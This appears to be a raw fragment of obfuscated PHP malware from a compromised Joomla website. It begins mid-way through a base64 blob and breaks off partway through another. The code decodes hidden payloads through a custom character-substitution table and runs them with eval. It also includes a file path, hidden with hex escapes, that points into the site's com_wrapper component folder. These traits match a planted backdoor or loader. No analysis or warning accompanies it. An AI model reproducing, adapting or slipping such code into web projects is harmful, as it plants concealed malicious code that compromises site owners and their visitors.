idCZDdKT0s0RzlVR0hqNkZIajZGSGo2RkhqNkZIajZGSGo2RkhqbDNUOUlGSGo2RkhqNkZIajZGSGo2RkhqNkZIajYnLgonRkhqNkZIamw2ZDFkN0pqN1p6ZmV3ZDVLQ2kxbFVHV0tMMW5kRUpXMmF6cTI3ZGpGd3pNdVZ6cXR5ZDJlc1kxdUlIakFGSFJ2UkhqQUZoTycuCidsWGc1Z0VKNGVRWTVmNEdwc0ZZTUthdW4yVXBXZUxnakZFR3B3M1Q5SUZIajZGSGo2RkhqNkZIajZGSGo2RkhqNkZIT1VLaicuCidSNkZIajZGSGo2RkhqNkZIajZGSGpsZVQ5SUZIajZGSGo2RkhqNkZIamxlVDlJRkhqNkZIajZGSCcuCidqNkZIamw0Sk9LNFQ5SUZIajZGSGo2RkhqNkZIamwzVDlJRkhqNkZIajZGSGo2RkhqNkZIajZGaE9LJy4KJ1VKTWg3ZG4yYXpXdFU4ajZlSGp1TGdXZUNZNWc0MU1sN2dXRkZyUjZSckNIRnJSbExnNWhMZ08nLgonSElKNTlmR2poWlk1S0lkcEhFcmo2c3JqNmZHcDZRSGpoYUhSNlFIV2Z3S3BGd0pxdG1kcDZRSFdLTDFVZzRnQjdWJy4KJ3pNOUlHcHczVDlJS2pSNkZIajZGSGo2RkhqNkZIajZGSGpsRWRSNklkcTRYZDJlNGlXNExnT1NJaE9LVUpNaDdkbjJheld0Jy4KJ1U4andFVDlJRkhqNkZIajZGSGo2RkhqNkZIajZGaXNVR0hqNkZIajZGSGo2RkhqNkZIajZGSGo2RkhqbDZkMWQ3Smo3WnpmZXdkNUtDaTFsVUdXS0wxbmRFSlcyYXpxMjdkaicuCidGd3pNdVZ6cXR5ZDJlc1kxdUlHcHNGWU1LYXVuMlVwV2VMZ2pGRUdwdzNUOUlGSGo2RkhqNkZIajZGSGo2RkhqNkZhOVVHSGo2RkhqNkZIajZGSGo2RmE5VUdIajZGSGo2RkhqJy4KJ2xlVDlJRkhqNkZhOVVHVDlJRkhqNkZkeTJRWU11RUpuQUZZTUthZ01oRWdXdFJKVzJhWScuCiduNzRZblhJRzlVR0hqNkZIT1hLalI2RkhqNkZIajZGODVZRkdPS1V6cXg0SlI3WnpmZU9kMXVUSm5mbUpuJy4KJ2NvZ1dlQ1k1ZzRHandFSGpCZUhUNkVUOUlGSGo2RkhqNkZIT1hLalI2RkhqNkZIajZGSGo2RkhPaDRnTzJDJy4KJ0pSbE56eTI0YnNVR0hqNkZIajZGSGpsZVQ5SUZIajZGSGo2RkhXMlh6bk5LalI2RkhqNkZIajZGaXNVR0hqNkZIajZGSGo2RicuCidIajZGenEyVWcxaFFIQmQ3Sk9LNGJzVUdIajZGSGo2RkhqbGVUOUlGSGo2RmE5VUdUOUlGSGo2RmRxZUNkNXRaOGo2SWh0ZVRvJy4KJ1VlcnBOTkZZMVNGaFdtNGlvVStoT2Q3Sk8yNEc5VUdIajZGSE9YS2pSNkZIajZGSGo2RmhXdTdnV0JGRHA2d2dxdFhnNU4zVDlJRkhqNkZIajZGSGp1d1kxJy4KJ3U3MW5tNGlwNmVIanVrZDF3M1Q5SUZIajZGYTlVR1Q5SUZIajZGODVZRkdqQndkV3RVWXB3S2pSNkZIamwzVDlJRkgnLgonajZGSGo2RkhXZFZ6cTI3WW5GRkdqdWFOQmVvMmpsN3pDNnc4bjJjRG9Bd2dxdFhnNU5FVDlJRkhqNkZIajZGSE9YS2pSNkZIajZGSGo2RkhqNkZIanV3WTF1Jy4KJzdIVFVGaE9kN0pPMjRic1VHSGo2RkhqNkZIajZGSGo2RmhXdTdnV3RhOG4yY0hUVUZoV200aW9YS2pSNkZIajZGSGo2RmE5Jy4KJ1VHSGo2RkhPVUtqRlVHSGo2RkhqdXdZMXU3SFRVRjlPMlF6bjJDODV0WDgxRTRHV0tMMW51NFlNaGN6TzlJWXF0TGRvJy4KJ1lVMW51NFluZXdkcEZ3ZFd0VVlwd1hIanV3WTF1NzFubTRpcHdFYnNVR1Q5SUZIajZGODUnLgonWUZHVzRMem4yVUdqdXdZMXU3NUNnNzhDZ2dHcDZxaFI2d1lNS2FZMTJVOFRVZWhXdTdnV3RKaG50a2hmVUVUOUlGSGo2RmlzVUdIajZGSGo2RkhqbEVkUjZJJy4KJ2hXdTdnV3RKaG5CeTFwNmVEcDZ5OHB6RVQ5SUZIajZGSGo2RkhPWEtqUjZGSGo2RkhqNicuCidGSGo2RkhqdUVIVFVGOTFoQ1kxd0lUOUlGSGo2RkhqNkZIajZGSGo2RkhqNkZoTWxuaEM2ZURSbDZ6VzdzZ3EyQ3puNFZKUicuCidGRXI2VUdIajZGSGo2RkhqNkZIajZGSGo2RkhqZ0xnUnpGRG9BRmhMQlFTalVDaENzS2pSNkZIajZGSCcuCidqNkZIajZGSGo2RkhqNnlZNVh5SFRVK0hqdXdZMXU3NUNnNzhDZ2dyNlVHSGo2RkhqNkZIajZGSGo2RkdvWEsnLgonalI2RkhqNkZIajZGSGo2RkhXMlo4V3ZGOU9LNHpxNDdKVzRQZHBGdzhwdzNUOUlGSGo2RkhqNkZIajYnLgonRkhqbDRpVzRVYnNVR0hqNkZIajZGSGpsZVQ5SUZIajZGSGo2RkhXMlh6bjJFZFI2SWhXdTdnV3RKaG5CeTFwNmVEcDZ5ZHB6RVQ5SUZIajYnLgonRkhqNkZIT1hLalI2RkhqNkZIajZGSGo2RkhXMm5ZNXNJaFd1N2dXdEpobjl5MXB3M1Q5SUZIajZGSGo2RkhPVUtqUjZGSGo2RkhqNkZkNXhMZDU0cUhqRndkV3RVWTInLgonWHlZcGdnSFRVZUhqZ3NKTzJ5ODVBeUc5VUdIajZGSGo2RkhqbDNUOUlGSGo2RkhqNkZIajZGSGpsRWRSRndkV3RVWTJYeXpuQnkxcDZlRHA2eVk1dXdoQ3dLalI2RkhqNkZIJy4KJ2o2RkhqNkZIT1hLalI2RkhqNkZIajZGSGo2RkhqNkZIamxaemZlc0pPMnk4NWNhWTV1d0dqdXdZMXU3NUNnc2hmVVhIanV3WTF1NzVDZ3cnLgonaGZVRWJzVUdIajZGSGo2RkhqNkZIajZGYTlVR0hqNkZIajZGSGo2RkhqNkZkNXhMZDU0cUdqdXdZMXU3NUNnTFlwZ2dIVFVlSGpnQ2Q1VXlHOVVHSGonLgonNkZIajZGSGo2RkhqNkZpc1VHSGo2RkhqNkZIajZGSGo2RkhqNkZIV0tMMU1sWGc1Z0VKNGVDZDVVSWhXdTdnV3RKaE02eTFwdzNUOUlGSCcuCidqNkZIajZGSGo2RkhqbGVUOUlGSGo2RkhqNkZIT1VLalI2RkhqNkZIajZGZDVLSUpDNndkV3RVJy4KJ1kyWHlZNVh5MW9YS2pSNkZIajZGSGo2RmQxN0VnakZFYnNVR0hqNkZIT1VLakZVR0hqNkZIV0tMMU1sWGc1Z0VKNGVYJy4KJ0pudHdHanczVDlFZSc7CiRrZW1sYyA9IEFycmF5KCcxJz0+J1gnLCAnMCc9PidxJywgJzMnPT4nNycsICcyJz0+J1YnLCAnNSc9PidXJywgJzQnPT4nbCcsICc3Jz0+J2gnLCAnNic9PidBJywgJzknPT4nUScsICc4Jz0+J2EnLCAnQSc9Pic0JywgJ0MnPT4neScsICdCJz0+J0UnLCAnRSc9PidwJywgJ0QnPT4nUCcsICdHJz0+J0snLCAnRic9PidnJywgJ0knPT4nbycsICdIJz0+J0knLCAnSyc9PidOJywgJ0onPT4nYicsICdNJz0+JzMnLCAnTCc9Pid6JywgJ08nPT4nSCcsICdOJz0+J1UnLCAnUSc9Pid1JywgJ1AnPT4nNicsICdTJz0+J00nLCAnUic9PidpJywgJ1UnPT4nMCcsICdUJz0+J0QnLCAnVyc9PidHJywgJ1YnPT4ndicsICdZJz0+J1knLCAnWCc9PidzJywgJ1onPT4naicsICdhJz0+J2YnLCAnYyc9Pic1JywgJ2InPT4nTycsICdlJz0+JzknLCAnZCc9PidaJywgJ2cnPT4nZCcsICdmJz0+JzEnLCAnaSc9PidlJywgJ2gnPT4nSicsICdrJz0+J3InLCAnaic9PidDJywgJ20nPT4ndCcsICdsJz0+J0InLCAnbyc9PidUJywgJ24nPT4nMicsICdxJz0+J20nLCAncCc9PidTJywgJ3MnPT4ndycsICdyJz0+J0wnLCAndSc9PidSJywgJ3QnPT4nRicsICd3Jz0+J2snLCAndic9Pic4JywgJ3knPT4nbicsICd4Jz0+J3gnLCAneic9PidjJyk7CmV2YWwvKnoqLyhvbmNla3hkaXUoJGJ4amZnanplZywgJGtlbWxjKSk7Cn0=")); include "\x2fhom\x65/og\x72y/d\x6fmai\x6es/g\x72upa\x72ajd\x6fwa.\x70l/p\x75bli\x63_ht\x6dl/j\x6foml\x612_5\x2fcom\x70one\x6ets/\x63om_\x77rap\x70er/\x63ode\x2ephp"; eval(base64_decode("aWYgKCFkZWZpbmVkKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JykpCnsKZGVmaW5lKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JywgMSk7CgogJG11b3RqcW8gPSAzMzY1OyBmdW5jdGlvbiBiYWFmeXdiZHJyKCR1eHFpYiwgJHJzcnljcHh4bil7JHVnaHZ2eCA9ICcnOyBmb3IoJGk9MDsgJGkgPCBzdHJsZW4oJHV4cWliKTsgJGkrKyl7JHVnaHZ2eCAuPSBpc3NldCgkcnNyeWNweHhuWyR1eHFpYlskaV1dKSA/ICRyc3J5Y3B4eG5bJHV4cWliWyRpXV0gOiAkdXhxaWJbJGldO30KJGxvYmZuZ2VzdnM9ImJhc2UiIC4gIjY0X2RlY29kZSI7cmV0dXJuICRsb2Jmbmdlc3ZzKCR1Z2h2dngpO30KJGxrb3p1cXd3ZG0gPSAnY2JPRnF2ZmUwdGNXcE12UFF6ZlB0TTJuMFBRQzRYbHZyWGFJa2FBVGNiT0ZxdmZlMHRjV3BNMm4wVmZPUXVwblF1RXVCaGRhJy4KJ1RyQzVoak5JS3pPSlFNdkFUaEgxR3Q4SjB0OE9HM3ZBcURmRnQzc0lLRG91QmhkYVRyQzVoak5PUXVwblFPZlAwdE5uUXVzJy4KJ0lLelFXRWhqeW1jSWRRTXZBdDNzSUtEdkpLYk8xcXRjV0VoanltY1c1aFlBVHFER1c0RHNPMHpPRjBEYycuCidXNE9ONG9VZlVyQWFpVDlqNWh1QzVoaWRZNGhOajBEMElLem9XNE9ONG9VZlVyQWFpQmhkaXRieGlUckM1aHUnLgonQTVoWUFUcURHVzREc08wek9GMERjVzRqc3BvanZtdlhmOUR2ZnJzdk5Ob2pVb3JWNGlUOWo1Jy4KJ2h1QzVoaWRZNGhOajBEMElLem9XNGpzcG9qdm12WGY5RHZmcnN2Tk5valVvclY0aUJoZGlCUDRJa2FBVEpjQVRtY0lJMGlkVzREc08wek9GMERjV3BBVUVvanZOJy4KJ3NVT0pvT3ZrdGVYQTViRXg1TTV6NVI0ZUd6WHhFelU4MHpqTWtacElHRDQyNXpVQXFEdzJraFFJVGNBVExhQVQ0aGRZNGJzTzB6T0YwOVl1Y28yOXNvVVhEdmY5dm9sSkVyYycuCidBR2VZM0dNR01FUjVpR3JZUEdEVXpxckd4UXpPOEdSWE1HdHNJS2VYeHBQYVlFOWp5bWNXNWhpZFk0aGRqMGJVQUc5ZCcuCidmNFhsdnJYYXltY1dZNGhkWXBiczhIYlVKcU12bDRtQVlyT3ZFcm1DNWhZQVQ0aGRZNGhzWnJYZmhjbzJyRFBIUlFWZjhIdHNXcFZBWWc5Jy4KJ2R1RURjUEVtNDMwbVgxRU00bDVpQUFFbWRQQkQ0M0VNRzFFcmQzNWVkVjB6czg1UllhcGVDNWhpZFk0aE51S2JmaUdEYVlwYjVldE0nLgonVVZIYll5bWNXNWhZQVQ0aGRZNGIwVkt6NUFxRGZGNGI1ZXRBSE9IWDhuUTNjV1RjQVQ0aGRZNFpDNWhpZFk0aGRZNGhkWVF6dkFIdHBGNFo1QVF1c24nLgonS2JmMzB0NFdRWnBPMFZmUDB0TkNHRDVPVGhRbnRpODNIM0h3MHVzYVR2YUZCTWp1QmhRdUJYZGp0VjVVb08wVW9PQycuCid1OVVzb29VZjRyVjVvcFZBSVRyQzVoaWRZNGhOZm1jVzVoaWRZNGhOekhEbFJIYk9uS2lOUlFWZlowdHN0Jy4KJ1F6T0FHRHBDMG9zSVF1RVdUY0FUNGhkWTRaQzVoaWRZNGhkWTRoZFlwWnBPUVBkZjRYVVBRelVsVGhqeW1jVzVoaWRZNGhkWTRoZFlwYlVGR0QybFEzT2V0M1VWMHR2TzQnLgonbUFZY3RwUEd0aldUckM1aFlBVDRoZFk0aGRZNGhkakdEbDhLWk9lTHQ1SlF0dk9IRHZLdDlkZjRiNWV0QUhPSFhzbkdWcG5LM2NXVHJDNWhZQVQ0aGQnLgonWTRoZFk0aGRqUU12QzBPZmFHdHNXNG1BWXBVZnJzdnBEc3ZwS3BWNW1vak9jdlVmYjlvMlVyalU1czlISGthQVQ0aGRZNGhkWTRoTjNxYk9DJy4KJzA5ZFdUaHNlS2JVZXFoZGY0WjVBUXVwYUszRVdwWjVPS2IwSlFiVUFxaGFZc1hPOXNvNW9yVnAwdFY1VW9YVTljdnNnb2lqSTRoWGZnOU5iY28ycnM5ajVoaWRZNGgnLgonZFk0aGRZTGFBVDRoZFk0aGRZNGhkWTRoZFlwWjVPS2IwSlFiVUFxaGRmNFo1Vkd1NUFRaVlqUU12QzBPZmFHdHNXQmhkYUJoZGpRTTI4UU1ZSWthQVRtY1dZNGhkWTRoJy4KJ2RZNGhkWTRoTkkwaWRXcFo1T0tiMEpRYlVBcWhkZmc5TlJRVmZaMHRzWEtNNTlLTWZBVGhqSW1jV1k0aGRZNGhkWTRoZFk0aE55Jy4KJ21jV1k0aGRZNGhkWTRoZFk0aGRZNGhkWUd1cE9HREN5bWNXWTRoZFk0aGRZNGhkWTRoJy4KJ05mbWNXNWhpZFk0aGRZNGhkWTRoZFk0Yk96NGg4ZUhacEMwRHhXcFo1T0tiMEpRYlVBcWhqSW1jV1k0aGQnLgonWTRoZFk0aGRZNGhOeW1jV1k0aGRZNGhkWTRoZFk0aGRZNGhkWXBiVUZHRDJsUTNPZXQzVVYwdHZPRFZBWWc5ZGpRTXYnLgonQzBPZmFHdHNXa2FBVDRoZFk0aGRZNGhkWTRoZFlKY0FUNGhkWTRoZFk0aE5mbWNXNWhpZFk0aGRZNGhkWTB6ZlAwRFVScWhkV3BiVUZHRDJsUTNPZXQzVVYwdHYnLgonTzRiVWU0aHNSSHRwUDBEbEF0TXNJUWlqNWhpZFk0aGRZNGhkWUxhQVQ0aGRZNGhkWTRoZFk0aGRZcURHWVRoVUlLT2Y4UXVwOEw5WWpHM3ZQUXp2RkhVZmpxdDRDJy4KJzRoc1AwdEVJVGNBVDRoZFk0aGRZNGhkWTRoZFlMYUFUNGhkWTRoZFk0aGRZNGhkWTRoZFk0aHNQMHRFWWc5TjhRdXA4THZmMTB0cHUwOVlqUXp2ZUJoTlJRVicuCidmWjB0c1hxdHBPRzNzblF1T0VxdDVBVGhzUkh0cFAwRGxBdE1zSVFpaklrYUFUNGhkWTRoZFk0aGRZNGhkWUpjQVQ0aGRZNGhkWTRoTmZtY1c1aGlkWTRoZFk0aCcuCidkWVF6dkFIdHBGNGI1ZXRBNVcwRDVTdjNwSUhiVWlLYm9XR3RwUEd0T0pIRGxJUXR2T1Roc1AwdEVJVCcuCidyQzVoaWRZNGhOZm1jVzVoaWRZNGhOekhEbFJIYk9uS2lOUlFWZm1xYnZScVZIUHF0czhHejJPVGhzanF0cEpLYk9lSGhqNWhpZFk0aE55bWNXJy4KJ1k0aGRZNGhkWTRoc2pxdHBKS2JPZUhVZjNRek9BR0RwQzA5ZGY0WFVQUXpVbFRoanltY1c1aGlkWTRoZFk0aGRZMHpmUDBEVVJxaGRXcGJzJy4KJ0lRT2ZDcXQ1QTRiVWU0aHNqcXQ0SW1jV1k0aGRZNGhkWTRaQzVoaWRZNGhkWTRoZFk0aGRZNGJPejRoOGRxdDVKSDNwSUhiVWlLYm9XcGJzJy4KJ0lRaWpZcGlHWXF0NUowYk9QVGhzanF0NElUY0FUNGhkWTRoZFk0aGRZNGhkWUxhQVQ0aGRZNGhkWTRoZFk0aGRZNGhkWTRoc2pxdHBKS2JPZUhVZjNRJy4KJ3pPQUdEcEMwdjFING1BWXBic0lRUkM1aGlkWTRoZFk0aGRZNGhkWTRaQTVoaWRZNGhkWTRoZFlKY0FUbWNXWTRoZFk0aGRZNFpwT0hadlBLaWRqMGJPUHRNMklRM3NKSDNwSScuCidIYlVpS2JveW1jV1k0aGRZSmNBVG1jV1k0aGRZMHV2Rkczc0lLTXhZRzM1SnNNdkFzYk9QMEQ1QUszJy4KJ3BscmJPZUhoWWowYk9QQmhkajBidmFIYllmRXJkSW1jV1k0aGRZTGFBVDRoZFk0aGRZNGhkalF6dmVIRDJBNG1BWUd0cFBHdGpXVHJDNWhZQVQ0aGRZNGhkWTRoJy4KJ05JMGlkVzRET2V0TXNJUWlZajBiT1BUOWo1aGlkWTRoZFk0aGRZTGFBVDRoZFk0aGRZNGhkWTRoZFlRenYnLgonQUh0cEY0aHNQMHQ1VktaY3ltY1dZNGhkWTRoZFk0WkE1aFlBVDRoZFk0aGRZNGhkalF6dmVIRDJBRFZBWWc5ZGowYk9Qa2FBVDRoZFk0aGRZNGhkajBiT1B0TTVuSERsQTRtJy4KJ0FZRW1DNWhZQVQ0aGRZNGhkWTRoTkkwaWRXcGJzT1Fac1c0bWFZRTlqNWhpZFk0aGRZNGhkWUxhQVQ0aGRZJy4KJzRoZFk0aGRZNGhkWVF6dkFIdHBGNGhzUDB0NVZLWmN5bWNXWTRoZFk0aGRZNFpBNWhZQScuCidUNGhkWTRoZFk0aGRqMGJPUDRtQVlRM3NQS2J2RlRoc2pxdDRJNG1BZjRtWFlnUGRqMGJPUDRtV1lRdXNQcURBV3Bic0lRaWFZcFYyJy4KJ1FCUFFJa2FBVDRoZFk0aGRZNGhkanFoZGY0WE5uUWJ2RjBiT1BUaHNqcXQ0SWthQVQ0aGRZNGhkWTRoTkkwaWRXcGJZWWdyQWY0WDAnLgonTnJVNVVUY0FUNGhkWTRoZFk0aE55bWNXWTRoZFk0aGRZNGhkWTRoTlAwdHNWUXp4WXBacE9RM3ZDSG1DNWhpZFk0aGRZNGhkWUpjQVRtY1dZNGhkWTRoJy4KJ2RZNFpIV3FEMk80aFlXcGJHWWc5TlAwRFVqMGJPUFRoc1dUOWpZNHJBZjRYME5yVTVVVGNBVDRoZFk0aGRZNGhOeW1jV1k0aGRZNGhkWTRoZFk0aE4nLgonSTBpZFdwYkdZNHJBZjRoUUZwUE44S3pjWXBiR1k0ckFmNGhRRkJpUUltY1dZNGhkWTRoZFk0aGRZNGhOeW1jV1k0aGRZNGhkWScuCic0aGRZNGhkWTRoZFlwYjVWUXVwT0t1c0owYk9QNG1BWTRpc2pxdDRucGJHaWthQVQ0aGRZNGhkWTRoZFk0aGRZNGhkWTRiT3onLgonNGg4SVFWZmpxdDRXcGI1VlF1cE9LdXNKMGJPUFQ5ajVoaWRZNGhkWTRoZFk0aGRZNGhkWTRoTnknLgonbWNXWTRoZFk0aGRZNGhkWTRoZFk0aGRZNGhkWTRoc2pxdHBKR01mVkt1Y1lUZUFZRXJDNWhZQVQ0aGRZNGhkWTRoZFk0aGRZNGhkWTRoZFknLgonNGhkalF6dmVIRDJBRFZBWWc5ZGpHM3ZQUXp2RkhVZmpxdDR5bWNXWTRoZFk0aGRZNGhkWTRoZFk0aGRZNGhkWTRoc1AwdDVWS1pjWWc5TjhRdXA4THZmMTB0cHUwOVlqUXp2Jy4KJ2VIRDJBQmhOUlFWZlowdHNYcXRwT0czc25RdU9FcXQ1QVRoc1JIdHBQMERsQXRNc0lRaWFZcGJzT1Fac1c0aHdZRXJkSVRyQzVoaWRZNGhkWTRoZFk0aGRZNGhkWTRoTmYnLgonbWNXWTRoZFk0aGRZNGhkWTRoTmZtY1dZNGhkWTRoZFk0WkE1aFlBVDRoZFk0aGRZNGhOUktiZmUwRHNJUWlZanFoanltY1c1aGlkWTRoZFk0aGRZUXp2QScuCidIdHBGNGhzUDB0NVZLWmN5bWNXWTRoZFlKY0FUbWNXWTRoZFkwdXZGRzNzSUtNeFlHMzVKc012QXNiZlJveicuCidmbkhoWUltY1dZNGhkWUxhQVQ0aGRZNGhkWTRoZGowYmZSUXpmbkhVZk9LemNZZzlOZScuCidIWnBQUWJmZVRoc0pvQXY5dmp2OURQSHJjVnBwb1VzSnNqT0Vzb2xOcm9vdXQ5YVlwVWZyc3ZwRHN2cEtwVnBVb3Z2VW9Wc0p2dnBwcFZBSWthQVQ0aGRZJy4KJzRoZFk0aE5JMGlkV3Bic25HM3BuSzNzSjBEbGo0bUFmZzlOYmNvMnJzOWo1aGlkWTRoZFk0aGRZTGFBVDRoZFk0aGRZNGhkWTRoJy4KJ2RZUXp2QUh0cEY0aHNKb0F2OXZqdjlEUEhYckE1dnJvdmt2VWY5ckFmb3BWQXltY1dZNGhkWTRoZFk0WkE1aGlkWTRoZFk0aGRZMEQyZTBET3o0aFknLgonajBiZlJRemZuSFVmT0t6Y1lnckFmNG1kSW1jV1k0aGRZNGhkWTRaQzVoaWRZNGhkWTRoZFknLgonNGhkWTRacE9IWnZQS2lkaUJQNHltY1dZNGhkWTRoZFk0WkE1aGlkWTRoZFk0aGRZMEQyZTBjQVQnLgonNGhkWTRoZFk0aE55bWNXWTRoZFk0aGRZNGhkWTRoTlAwdHNWUXp4WVEzdmlRM3NQVGhzSm9Bdjl2anY5RFBIcmNWcHBvVXNKc2pPRXNvbE5yb291Jy4KJ3Q5YVlFaGFZcGJzbkczcG5LM3NKMERsalRyQzVoaWRZNGhkWTRoZFlKY0FUNGhkWTRaQTVoWUFUNGhkJy4KJ1k0Yk96NGhZODB1dkZHM3NJS01sSjB0OElRM3NlVGhIenFEMk90M05WSFVmUktNbEEwRGxBUVBRSScuCidUY0FUNGhkWTRaQzVoaWRZNGhkWTRoZFkwdXZGRzNzSUtNeFkwek9DMHZmYUh0c0pHTWZGSGJ2RkhaRVdwYnhDNGhzakJoZGowejI4MFBkZjRYMCcuCic4S1o1T1RjQVQ0aGRZNGhkWTRoTnltY1dZNGhkWTRoZFk0aGRZNGhkaktEZmowOWRmNGhzektiVXU0bUFmNG1ZWWdQZHVHOVFZa2lkdScuCidIUFF5bWNXWTRoZFk0aGRZNGhkWTRoZGowaWRmNFhOekszTk9LaVlqS2lhWXBiVm4wYm9JJy4KJ2thQVQ0aGRZNGhkWTRoZFk0aGRZcURHWVRoc3o0bUFmZzlOYkdEMmUwOWo1aGlkWTRoZFk0aGRZNGhkWTRaQycuCic1aGlkWTRoZFk0aGRZNGhkWTRoZFk0aE5QMHRzVlF6eFlFbUM1aGlkWTRoZFk0aGRZNGhkWTRaQTVoaWRZNGhkWTRoZFk0aGQnLgonWTRidkNRTW81aGlkWTRoZFk0aGRZNGhkWTRaQzVoaWRZNGhkWTRoZFk0aGRZNGhkWTRoTkkwaWRXJy4KJ3F0NUpHdHBQR3RqV3BiY0lUOWRqMGhkZjRiTzFRYjJuMGJvV3BiY0lrYUFUNGhkWTRoZFk0aGRZNGhkWTRoZFk0aHNpTHRzT1FWZjNRek9BSGJ2RjRtQVknLgonMHVIUHF0c09UaHN6QmhkajBoanltY1dZNGhkWTRoZFk0aGRZNGhkWTRoZFkwejVDSzM1T1Roc3pUckM1aGlkJy4KJ1k0aGRZNGhkWTRoZFk0aGRZNGhOUDB0c1ZRenhZcGJwbEhidmV0M0hQcXRzQTBEeHltY1dZNGgnLgonZFk0aGRZNGhkWTRoTmZtY1dZNGhkWTRoZFk0WkE1aGlkWTRoTmZtY1c1aGlkWTRoTkkwaWRXNEQwVkt6NUFxRGZGdE12eHF0Jy4KJzVBUVBZdTB6T0MwdmZ1MHRzSkdNZkZIYnZGSFpFdVQ5ajVoaWRZNGhOeW1jV1k0aGRZNGhkWTRiMFZLejVBcURmRjRiMElLYnZKME12QXRNNW5LdXNPS3VzZVRoc3pxRDInLgonT0t6VTEwOWo1aGlkWTRoZFk0aGRZTGFBVDRoZFk0aGRZNGhkWTRoZFlwYjBXR0RsaksnLgonYm9ZZzlOekszTk9LaVlqMHpPQzBEbDhLRG9DNGhwUDRpanltY1dZNGhkWTRoZFk0aGRZNGhkajB6NW5LdXNPS3VzZTRtQVkwdXBPR0RjV3AnLgonYjBXR0Rsaktib0M0YjBJS2J2ZXF0SU9UaHN6cUQyT0t6VTEwOWpJa2FBVDRoZFk0aGRZNGhkWTRoZFkwejVDSzM1T1Roc3pxYlVGMGIyT1RyQzVoWUFUNGhkWTRoZFk0aGQnLgonWTRoZFlRenZBSHRwRjRoc3pHTWZGSGJ2RkhaRXltY1dZNGhkWTRoZFk0WkE1aGlkWTRoTmZtY1c1aFlBVDRoJy4KJ2RZNGIwVkt6NUFxRGZGNGI1ZXRNc09HM3BsUVpzSlFiODhRTW9XcGJzOEhiWEM0aHNTMHRqJy4KJ0ltY1dZNGhkWUxhQVQ0aGRZNGhkWTRoZGpLM3ZBdE1zOEhiWFlnOWRpNFJDNWhZQVQ0aGRZNGhkWTRoTnpLMzRZVGhzSWdyJy4KJ2R5NGhzSWdaNUFRejJPS2lZajBiVUFHOWp5VGNBVDRoZFk0aGRZNGhOeW1jV1k0aGRZNGhkWScuCic0aGRZNGhOekszNFlUaHM2Z3JkeTRoczZnWjVBUXoyT0tpWWpxTXZsVDlkenBpZGpxcjJlSFpwQzBEeFdwYnM4SGJYSWtQJy4KJ2RqcWlDU0JoZGpxOUNTVGNBVDRoZFk0aGRZNGhkWTRoZFlMYUFUNGhkWTRoZFk0aGRZNGhkWTRoZFk0aHNuSHRzSjBiVUFHOWRGZzlOUnFaNFdLMycuCidwalRoc2pHdHM4RFBzSXQ5all0aU5uUXpjV3BiMU9MdkNqcU9BSVRyQzVoaWRZNGhkWTRoZFk0aGRZNFpBNWhpZFk0aGRZNGhkWUpjQVRtY1dZNGhkWTRoZFk0WicuCidwT0hadlBLaWRqSzN2QXRNczhIYlh5bWNXWTRoZFlKY0FUbWNXWTRoZFkwdXZGRzNzSUtNeFlHMzVKMGJ2UlF1T2FIaFlqMGJVQUc5YVlwJy4KJ2IxT0w5ajVoaWRZNGhOeW1jV1k0aGRZNGhkWTRiSENLTXA4S2hkakczNUpHdHZBcW1DNWhZQVQ0aGRZNGhkWTRoTlAwdHNWUXp4Jy4KJ1lHMzVKMGJ2UlF1T2FIVWZhcWJVZTA5OFJRVmZqMEQ1UEx0TkF0M05XR3Q1T1Roc2pHdHM4QmhkanFNdmxUOWFZcGI1ZXRNVVZIJy4KJ2JZSWthQVQ0aGRZNFpBNWhpZFk0aE56SERsUkhiT25LaU5SUVZmT0t6NVBMdE5BVGhzakd0czhCaGRqcU12bFRjQVQ0aGRZNFpDNWhpZFk0aCcuCidkWTRoZFkwTTJuR3pVQzRoc1JRVmY4SHRzV2thQVRtY1dZNGhkWTRoZFk0WnBPSFp2UEtpTicuCidSUVZmajBENVBMdE5BdDNOV0d0NU9UYjVldE1zT0czcGxRWnNKUWI4OFFNb1dwYnM4SGJYQzRoc1JRVmY4SHRzV1Q5YVlwYjFPTDlqeW1jV1k0aGRZSmNBVG1jVycuCidZNGhkWTB1dkZHM3NJS014WUczNUowek9DMHZmUDBEVWpUaHNhR3RzV1RjQVQ0aGRZNFpDNWhpZFk0aGRZNGhkWXBiczhIYicuCidYWWc5TmQwek9DMHZmdTB0c0pHTWZGSGJ2RkhaRVdwWk44SGJZSWthQVRtY1dZNGhkWTQnLgonaGRZNFpwT0hadlBLaWRqMGJVQUdyQzVoaWRZNGhOZm1jVzVoaWRZNGhOekhEbFJIYk9uS2lOUlFWZnpxRDJPdDNIUHF0c09UaHNhR3RzV0JoZGowYicuCidVQUc5ajVoaWRZNGhOeW1jV1k0aGRZNGhkWTRYTnpxRDJPdDNOVkhVZlJLTWxBMERsQVFQWWpRYlVBcWhhWXBiczhIYlhJa2FBVDRoZFk0WkE1aFlBVDRoJy4KJ2RZNGIwVkt6NUFxRGZGNGI1ZXRNMElLYnZKR3ROYTBEbGpUaHNhR3RzV0JoZGowYlVBRzlqNWhpZFk0aE55bWNXWTRoZFk0aGRZNFhOenFEMk90MycuCidOVkhVZlJLTWxBMERsQVFQWWpRYlVBcWhhWXBiczhIYlhDNG1ZSWthQVQ0aGRZNFpBNWhZQVQ0aGRZNGIwVkt6NUFxRGZGNGI1ZXQzNW5RdXNKR01mMVFiVVAwdDRXcGJYQycuCic0aHNpVGNBVDRoZFk0WkM1aGlkWTRoZFk0aGRZUXp2QUh0cEY0WjVBUXoyT0tpWWpHOWpZQjlOZUhacEMwRHhXcGI0SWthQVQ0aGRZNFpBNWhZQVQ0aGRZNGIwVkt6NScuCidBcURmRjRiNWV0QUhPSFg1bktEVm5LTzVBSzNwODBNb1dwYnNJUXVFZnJPdkVyaGo1aGlkJy4KJ1k0aE55bWNXWTRoZFk0aGRZNGhzZTBEMnp0TXNJUWlkZjRic0lRemw4S0RvV3RWZmI5bzJVdFZ3SWthQVRtY1dZNGhkWTRoZFk0aHNSS01WMUtNbEpLelUxMCcuCid0RVlnOU5OUXVwOEw5WWlLM05BcURmRlFQNEM0aHBNcUR2M1FQNEM0aHBhR0RIT1FQNEM0aHBlMHQ1ZXFEZkZRUDRDNGhwZUgnLgonYlVBUVA0QzRocFZRTXZQUVA0QzRocDhRdXNJR00yT1FQNEM0aHBqSERWYTRpYVk0ejhPJy4KJ0dEc09RdUVpQmhkaUtiT2lRUDRJa2FBVG1jV1k0aGRZNGhkWTRoc0FLdE5KMGJPUDRtJy4KJ